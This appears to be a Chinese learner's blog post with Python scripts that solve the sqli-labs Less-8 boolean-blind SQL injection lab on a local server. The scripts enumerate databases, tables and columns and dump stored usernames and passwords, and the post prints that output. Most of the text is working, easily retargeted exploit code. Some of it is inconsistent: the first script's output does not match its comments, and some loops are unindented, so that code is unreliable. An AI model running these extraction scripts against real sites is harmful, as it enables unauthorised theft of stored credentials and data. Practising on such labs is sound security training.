以下是sql-labs 第八关的python脚本
唉,调试了好久
python的循环是没有{}的,所以大家写的时候一定要注意哪个嵌套哪个,缩进一定要弄好,不能错,否则就算不报错,运行结果也不对(╬▔皿▔)╯
import requests
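header = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0',
    'Accept-Language': 'zh-CN,zh;q=0.9',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8'
}
# Boolean-blind target: sqli-labs Less-8 on the local lab box.  The trailing
# quote closes the original string literal; every probe appends " and <cond> --+".
base_url = "http://127.0.0.1/sql-labs/Less-8/?id=1'"
# Less-8 prints this banner only when the injected WHERE clause is true.
TRUE_MARK = 'You are in...........'
# Schema whose tables are enumerated (sqli-labs' own database).
SCHEMA = 'security'
# Printable ASCII.  The original tried only codes 65..122 (A-Z, a-z and a few
# symbols), so digits and punctuation were silently dropped ("admin1" came
# back as "admin", "p@ssword" as "pssword").
CHARSET = range(32, 127)
# Exclusive upper bounds for the linear length / row-count probes.
MAX_LENGTH = 50
MAX_COUNT = 100


def oracle(condition):
    """Send one probe and report whether the injected SQL condition was true.

    Anything without the banner -- including an error page -- counts as
    false; that is the usual blind-injection caveat, so verify surprising
    results by hand.  A timeout keeps a stalled server from hanging the run.
    """
    response = requests.get(base_url + f' and {condition} --+', headers=header, timeout=10)
    return TRUE_MARK in response.text


def find_length(expr, limit=MAX_LENGTH):
    """Return length(expr) by probing 1..limit-1; 0 when nothing matched.

    Returning 0 instead of leaving a stale value from the previous item is
    what keeps an empty/NULL/over-long value from being read with the
    previous item's length.
    """
    for n in range(1, limit):
        if oracle(f'length({expr})={n}'):
            return n
    return 0


def find_count(expr, limit=MAX_COUNT):
    """Return the scalar result of the COUNT query `expr` by probing 0..limit-1 (0 if unmatched)."""
    for n in range(limit):
        if oracle(f'({expr})={n}'):
            return n
    return 0


def find_string(expr):
    """Recover the string value of SQL expression `expr` one character at a time.

    Compares ord(substr(...)) against a numeric code, which is exact and
    case-sensitive.  The original compared substr() with a quoted letter,
    which is case-insensitive under MySQL's default collation -- the first
    matching candidate was always the uppercase one, hence the .lower() on
    every print.  A position matching nothing in CHARSET is reported as '?'
    so the remaining positions stay aligned; note that such a name would then
    break the follow-up queries that interpolate it as an identifier.
    """
    chars = []
    for pos in range(1, find_length(expr) + 1):
        for code in CHARSET:
            if oracle(f'ord(substr({expr},{pos},1))={code}'):
                chars.append(chr(code))
                break
        else:
            chars.append('?')
    return ''.join(chars)


# Current database name.
database_name = find_string('database()')

# Tables of SCHEMA.  `limit N,1` is 0-based: the original started at 1, which
# skipped the first table/column/row and produced one empty trailing entry.
table_counts = find_count(
    f"select count(table_name) from information_schema.tables where table_schema='{SCHEMA}'")
for i in range(table_counts):
    table_name = find_string(
        f"(select table_name from information_schema.tables where table_schema='{SCHEMA}' limit {i},1)")
    print(f'表{i + 1}的名称为:' + table_name)
    # Columns of this table.
    column_counts = find_count(
        f"select count(column_name) from information_schema.columns "
        f"where table_name='{table_name}' and table_schema='{SCHEMA}'")
    for b in range(column_counts):
        column_name = find_string(
            f"(select column_name from information_schema.columns "
            f"where table_name='{table_name}' and table_schema='{SCHEMA}' limit {b},1)")
        print(f'列{b + 1}的名称为:' + column_name)
        # Rows of this column.  count(col) ignores NULLs while `limit y,1`
        # walks every row, so NULL cells can shift the row numbering (as in
        # the original); count(*) would be the consistent choice.
        information_counts = find_count(f"select count({column_name}) from {table_name}")
        for y in range(information_counts):
            information_name = find_string(f"(select {column_name} from {table_name} limit {y},1)")
            print(f'数据{y + 1}的名称为:' + information_name)

print('数据库名称为:' + database_name)
print('该数据库下表的个数为:' + str(table_counts))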
运行结果
E:\python\python.exe "D:\python\test1\aql-labs\less-8 三.py"
表1的名称为:referers
列1的名称为:referer
列2的名称为:ip_address
列3的名称为:
表2的名称为:uagents
列1的名称为:uagent
列2的名称为:ip_address
列3的名称为:username
列4的名称为:
表3的名称为:users
列1的名称为:username
数据1的名称为:angelina
数据2的名称为:dummy
数据3的名称为:secure
数据4的名称为:stupid
数据5的名称为:superman
数据6的名称为:batman
数据7的名称为:admin
数据8的名称为:admin
数据9的名称为:admin
数据10的名称为:admin
数据11的名称为:dhakkan
数据12的名称为:admin
数据13的名称为:
列2的名称为:password
数据1的名称为:ikillyou
数据2的名称为:pssword
数据3的名称为:crappy
数据4的名称为:stupidity
数据5的名称为:genious
数据6的名称为:moble
数据7的名称为:admin
数据8的名称为:admin
数据9的名称为:admin
数据10的名称为:admin
数据11的名称为:dumbo
数据12的名称为:admin
数据13的名称为:
列3的名称为:
数据1的名称为:
数据2的名称为:
数据3的名称为:
刚开始学着写,可能并不好
我还看到一种代码,比我的这个好多了:它用 ord() 比较字符编码(精确且区分大小写,不受默认排序规则大小写不敏感的影响),并用 group_concat 一次取出整列名字,而不是按 limit 逐行爆破。
# 1. 设置全局变量DIS 和list用于控制详细信息的显示以及定义需要爆破的ASCII码
# 2. 爆破当前数据库长度
# 3. 定义数据库长度爆破函数Brute_length()
# 4. 爆破当前数据库名称
# 5. 定义数据库名爆破函数Brute_database()
# 6. 爆破所有数据库长度
# 7. 爆破所有数据库名称
# 8. 爆破表名
# 9. 定义表名爆破函数Brute_table()
# 10. 爆破字段名
# 11. 定义字段爆破函数Brute_column()
# 12. 爆破数据
# 13. 定义数据爆破函数data_dump()
import requests
import time
import sys
# 1. 设置全局变量DIS 和list用于控制详细信息的显示以及定义需要爆破的ASCII码
DIS = True
list = [44, 46, 95, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58]
for i in range(97, 123):
list.append(i)
for i in range(64, 91):
list.append(i)
for i in range(33, 76):
list.append(i)
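def sql_Inject(url, flag, display):
    """Interactive driver: enumerate databases, tables, columns and rows with
    the Brute_* / data_dump helpers, prompting the operator at each stage.

    url: request URL up to and including the injectable value (no trailing quote).
    flag: bytes present in the response body only when the injected condition is true.
    display: echo every probe URL; stored in the module global DIS read by the helpers.
    """
    global DIS
    DIS = display

    def _yes(prompt):
        # The original accepted only a lowercase 'yes'; 'y' / 'YES' now work too.
        return input(prompt).strip().lower() in ("yes", "y")

    def _again(prompt):
        # Keep looping unless the operator answers no/n (the original broke only on 'no').
        return input(prompt).strip().lower() not in ("no", "n")

    # Current database: length first, then the name.
    current_length = Brute_length(url, flag, current=True)
    print("当前数据库长度:", current_length)
    current_database_name = Brute_database(url, current_length, flag, current=True)
    print("当前数据库名称:", current_database_name)

    # All schemas as one group_concat string; optional because it is the slowest step.
    length = Brute_length(url, flag)
    print("数据库全长:", length)
    if _yes("Brute all the databases?[yes/no]: "):
        database_name = Brute_database(url, length, flag)
        print("数据库名称:", database_name)

    # Table names of a chosen schema.
    while True:
        choose_database = input("choose the database: ")
        table_name = Brute_table(url, choose_database, flag)
        print("数据库: %s" % choose_database)
        print("表: %s" % table_name)
        print('')
        if not _again("continue brute the tables?[yes/no]: "):
            break

    # Column names of a chosen table.
    while True:
        choose_database = input("choose the database: ")
        choose_table = input("choose the table: ")
        column_name = Brute_column(url, choose_database, choose_table, flag)
        print("表: %s.%s" % (choose_database, choose_table))
        print("字段: %s" % column_name)
        print('')
        if not _again("continue brute the columns?[yes/no]: "):
            break

    # Row data of chosen column(s); the column prompt is pasted verbatim into
    # group_concat(), so "a,b" dumps both columns concatenated per row.
    while True:
        choose_database = input("choose the database: ")
        choose_table = input("choose the table: ")
        choose_column = input("choose the column: ")
        data = data_dump(url, choose_database, choose_table, choose_column, flag)
        print("字段: %s.%s.%s" % (choose_database, choose_table, choose_column))
        print("数据: %s" % data)
        print('')
        if not _again("continue dump the data?[yes/no]: "):
            break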
# 13. 定义数据爆破函数data_dump()
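def data_dump(url, database, table, column, flag):
    """Dump group_concat(column) from database.table via boolean-blind probes.

    url: request URL up to and including the injectable value (no trailing quote).
    database, table, column: pasted verbatim into the injected SQL (operator input).
    flag: bytes present in the response body only when the injected condition is true.

    Returns the recovered string.  A position whose character is not in the
    module-level `list` of candidates is reported as '?' instead of being
    silently dropped, so later positions keep their offsets.  Every request
    carries a 10 s timeout; the original could block forever on a stalled
    server.  Note that group_concat output is capped server-side by
    group_concat_max_len (1024 bytes by default), so long result sets are
    truncated before this code ever sees them.
    """
    raw_url = url
    expr = "(select group_concat(%s) from %s.%s)" % (column, database, table)

    def _true(condition):
        # One probe: echo the URL when DIS is set, then look for the true-page marker.
        probe = raw_url + "' and " + condition + " --+"
        if DIS:
            print(probe)
        return flag in requests.get(probe, timeout=10).content

    # Length, coarse: step by 10 while the value is still longer.
    jump = 10
    while _true("length(%s)>%d" % (expr, jump)):
        jump += 10
    jump -= 10
    # Length, fine: one at a time above the last passing multiple of 10.
    length = 1
    while _true("length(%s)>%d" % (expr, jump + length)):
        length += 1
    data_length = jump + length

    # Characters: ord() equality is exact and case-sensitive.
    data = ""
    for pos in range(1, data_length + 1):
        for code in list:
            if _true("ord(substr(%s,%d,1))=%d" % (expr, pos, code)):
                data += chr(code)
                break
        else:
            data += "?"
    return data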
# 11. 定义字段爆破函数Brute_column()
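def Brute_column(url, database, table, flag):
    """Recover the comma-joined column names of `database`.`table`.

    url: request URL up to and including the injectable value (no trailing quote).
    database, table: interpolated into the injected SQL as quoted literals; they
        come from the operator's prompt, so a name containing a quote breaks the query.
    flag: bytes present in the response body only when the injected condition is true.

    Returns the group_concat(column_name) string.  A position whose character
    is not in the module-level `list` of candidates is reported as '?' rather
    than silently dropped, so later positions keep their offsets.  Requests
    carry a 10 s timeout.  group_concat output is capped by group_concat_max_len
    (1024 bytes by default).
    """
    raw_url = url
    expr = ("(select group_concat(column_name) from information_schema.columns "
            "where table_schema='%s' and table_name='%s')" % (database, table))

    def _true(condition):
        # One probe: echo the URL when DIS is set, then look for the true-page marker.
        probe = raw_url + "' and " + condition + " --+"
        if DIS:
            print(probe)
        return flag in requests.get(probe, timeout=10).content

    # Length, coarse: step by 10 while the value is still longer.
    jump = 10
    while _true("length(%s)>%d" % (expr, jump)):
        jump += 10
    jump -= 10
    # Length, fine: one at a time above the last passing multiple of 10.
    length = 1
    while _true("length(%s)>%d" % (expr, jump + length)):
        length += 1
    column_length = jump + length

    # Characters: ord() equality is exact and case-sensitive.
    column_name = ""
    for pos in range(1, column_length + 1):
        for code in list:
            if _true("ord(substr(%s,%d,1))=%d" % (expr, pos, code)):
                column_name += chr(code)
                break
        else:
            column_name += "?"
    return column_name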
# 9. 定义表名爆破函数Brute_table()
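def Brute_table(url, database, flag):
    """Recover the comma-joined table names of schema `database`.

    url: request URL up to and including the injectable value (no trailing quote).
    database: interpolated into the injected SQL as a quoted literal (operator input;
        a name containing a quote breaks the query).
    flag: bytes present in the response body only when the injected condition is true.

    Returns the group_concat(table_name) string.  A position whose character
    is not in the module-level `list` of candidates is reported as '?' rather
    than silently dropped, so later positions keep their offsets.  Requests
    carry a 10 s timeout.  group_concat output is capped by group_concat_max_len
    (1024 bytes by default).
    """
    raw_url = url
    expr = ("(select group_concat(table_name) from information_schema.tables "
            "where table_schema='%s')" % database)

    def _true(condition):
        # One probe: echo the URL when DIS is set, then look for the true-page marker.
        probe = raw_url + "' and " + condition + " --+"
        if DIS:
            print(probe)
        return flag in requests.get(probe, timeout=10).content

    # Length, coarse: step by 10 while the value is still longer.
    jump = 10
    while _true("length(%s)>%d" % (expr, jump)):
        jump += 10
    jump -= 10
    # Length, fine: one at a time above the last passing multiple of 10.
    length = 1
    while _true("length(%s)>%d" % (expr, jump + length)):
        length += 1
    table_length = jump + length

    # Characters: ord() equality is exact and case-sensitive.
    table_name = ""
    for pos in range(1, table_length + 1):
        for code in list:
            if _true("ord(substr(%s,%d,1))=%d" % (expr, pos, code)):
                table_name += chr(code)
                break
        else:
            table_name += "?"
    return table_name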
# 5. 定义数据库名爆破函数Brute_database()
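def Brute_database(url, length, flag, current=False):
    """Recover `length` characters of the current database name (current=True)
    or of the comma-joined list of all schema names (current=False).

    url: request URL up to and including the injectable value (no trailing quote).
    length: number of characters to extract (from Brute_length with the same `current`).
    flag: bytes present in the response body only when the injected condition is true.

    Candidates come from the module-level `list` in both modes; the original
    restricted current=True to a-z, so a database named with digits or '_'
    came back with holes.  A position matching no candidate is reported as
    '?' so later positions keep their offsets.  Requests carry a 10 s timeout.
    """
    raw_url = url
    if current:
        expr = "database()"
    else:
        expr = "(select group_concat(schema_name) from information_schema.schemata)"

    def _true(condition):
        # One probe: echo the URL when DIS is set, then look for the true-page marker.
        probe = raw_url + "' and " + condition + " --+"
        if DIS:
            print(probe)
        return flag in requests.get(probe, timeout=10).content

    # ord() equality is exact and case-sensitive, unlike a quoted-string '='.
    database_name = ""
    for pos in range(1, length + 1):
        for code in list:
            if _true("ord(substr(%s,%d,1))=%d" % (expr, pos, code)):
                database_name += chr(code)
                break
        else:
            database_name += "?"
    return database_name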
# 3. 定义数据库长度爆破函数Brute_length()
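def Brute_length(url, flag, current=False):
    """Return the length of the current database name (current=True) or of
    the comma-joined list of all schema names (current=False).

    url: request URL up to and including the injectable value (no trailing quote).
    flag: bytes present in the response body only when the injected condition is true.

    Both modes now use the same two-phase search (steps of 10, then steps of
    1); the original walked the current-database length one probe at a time.
    The result is the same, with fewer requests.  Requests carry a 10 s timeout.
    A NULL/empty value yields 1 (no probe passes, so the fine phase stops at
    its starting point) -- same as the original.
    """
    raw_url = url
    if current:
        expr = "database()"
    else:
        expr = "(select group_concat(schema_name) from information_schema.schemata)"

    def _true(condition):
        # One probe: echo the URL when DIS is set, then look for the true-page marker.
        probe = raw_url + "' and " + condition + " --+"
        if DIS:
            print(probe)
        return flag in requests.get(probe, timeout=10).content

    # Coarse: step by 10 while the value is still longer.
    jump = 10
    while _true("length(%s)>%d" % (expr, jump)):
        jump += 10
    jump -= 10
    # Fine: one at a time above the last passing multiple of 10.
    length = 1
    while _true("length(%s)>%d" % (expr, jump + length)):
        length += 1
    return length + jump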
if __name__ == "__main__":
    # Local sqli-labs Less-8 target; the helpers append the closing quote and payload.
    url = "http://127.0.0.1/sql-labs/Less-8/?id=1"
    # Banner that only the "true" page of Less-8 contains (compared against response bytes).
    flag = b'You are in...........'
    # Do not echo every probe URL.
    display = False
    sql_Inject(url=url, flag=flag, display=display)
运行结果
E:\python\python.exe D:\python\test1\aql-labs\less-8.py
当前数据库长度: 8
当前数据库名称: security
数据库全长: 67
Brute all the databases?[yes/no]: yes
数据库名称: information_schema,challenges,mysql,performance_schema,security,sys
choose the database: security
数据库: security
表: emails,referers,uagents,users
continue brute the tables?[yes/no]: no
choose the database: security
choose the table: users
表: security.users
字段: id,username,password
continue brute the columns?[yes/no]: no
choose the database: security
choose the table: users
choose the column: username,password
字段: security.users.username,password
数据: DumbDumb,AngelinaI-kill-you,Dummyp@ssword,securecrappy,stupidstupidity,supermangenious,batmanmob!le,adminadmin,admin1admin1,admin2admin2,admin3admin3,dhakkandumbo,admin4admin4
continue dump the data?[yes/no]: no
进程已结束,退出代码为 0
人家的这个一目了然
不过这两种代码爆破还是有点慢的(每个字符最多要把整个字符集逐一试一遍,几十到上百次请求),可以使用二分法,把每个字符的请求数降到 7 次左右(log2(95)≈6.6)。
import requests
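def decide():
    """Return how many decimal digits length(database()) has (normally 1 or 2).

    Lower-bound binary search over 0..9 on the first character of
    length(length(database())), one '>' probe per step.  The original sent
    up to two probes per step ('>' then '<') and fell through to an implicit
    None if the window ever closed; with a single comparison the loop always
    converges on the value.  A response without the marker -- including an
    error page -- is treated as "not greater", the usual blind-injection caveat.
    """
    low, high = 0, 9
    while low < high:
        mid = (low + high) // 2
        page = requests.request(
            'get',
            f"http://127.0.0.1/sql-labs/Less-8/?id=1' and if(substr(length(length(database())), 1, 1)>{mid}, 1, 0)--+",
            timeout=10,
        ).text
        if 'You are in...........' in page:
            low = mid + 1
        else:
            high = mid
    return low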
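def ruler(size):
    """Return length(database()) as an int by recovering its `size` decimal digits.

    Each digit is found by a lower-bound binary search over 0..9 on
    substr(length(database()), pos, 1), one '>' probe per step.  The original
    reset the window to 0..126 after the first digit (wasted probes) and sent
    up to two probes per step.  Returns 0 for size <= 0 instead of failing on
    int('').
    """
    if size <= 0:
        return 0
    digits = ''
    for pos in range(1, size + 1):
        low, high = 0, 9
        while low < high:
            mid = (low + high) // 2
            page = requests.request(
                'get',
                f"http://127.0.0.1/sql-labs/Less-8/?id=1' and if(substr(length(database()), {pos}, 1)>{mid}, 1, 0)--+",
                timeout=10,
            ).text
            if 'You are in...........' in page:
                low = mid + 1
            else:
                high = mid
        digits += str(low)
    return int(digits)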
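def process(length):
    """Recover the `length`-character name of the current database.

    Each character is found by a lower-bound binary search over printable
    ASCII 32..126 on ascii(substr(database(), pos, 1)), one '>' probe per
    step (about 7 requests per character).  The original reset the window to
    0..126 after the first character and sent up to two probes per step.  A
    code outside 32..126 (or a position past the end, where ascii('') is 0)
    collapses to 32 and shows up as a space.  The partial name is printed
    after every character, as before; the full name is returned.
    """
    result = ''
    for pos in range(1, length + 1):
        low, high = 32, 126
        while low < high:
            mid = (low + high) // 2
            page = requests.request(
                'get',
                f"http://127.0.0.1/sql-labs/Less-8/?id=1' and if(ascii(substr(database(), {pos}, 1))>{mid}, 1, 0)--+",
                timeout=10,
            ).text
            if 'You are in...........' in page:
                low = mid + 1
            else:
                high = mid
        result += chr(low)
        print(result)
    return result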
if __name__ == '__main__':
    # Digits of the length -> the length itself -> the name, each by binary search.
    size = decide()
    length = ruler(size)
    result = process(length)
这只是一部分代码,运行结果如下
sec
secu
secur
securi
securit
security
进程已结束,退出代码为 0